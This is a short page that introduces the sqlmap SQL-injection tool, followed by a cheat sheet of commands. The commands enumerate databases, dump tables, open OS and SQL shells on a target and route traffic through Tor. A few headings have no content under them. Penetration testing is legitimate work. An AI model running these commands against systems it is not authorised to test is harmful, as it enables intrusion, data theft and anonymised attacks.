SQLMap - SQL Injecton

[Github Page -Download] (https://github.com/sqlmapproject/sqlmap)

What is SQLMap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.



To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

Cracking dumped databased users' password hashes (switch –passwords):


Enumerating database table’s columns (switch –columns):


Conducting through tests only if positive heuristic(s) (switch –smart):


SQLmap Cheat Sheet

Enumerate databases

sqlmap --dbms=mysql -u "$URL" --dbs

Enumerate tables

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

Dump table data

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

Specify parameter to exploit

sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

Specify parameter to exploit in ‘nice’ URIs

sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

Get OS shell

sqlmap --dbms=mysql -u "$URL" --os-shell

Get SQL shell

sqlmap --dbms=mysql -u "$URL" --sql-shell

SQL query

sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

Use Tor Socks5 proxy

sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
comments powered by Disqus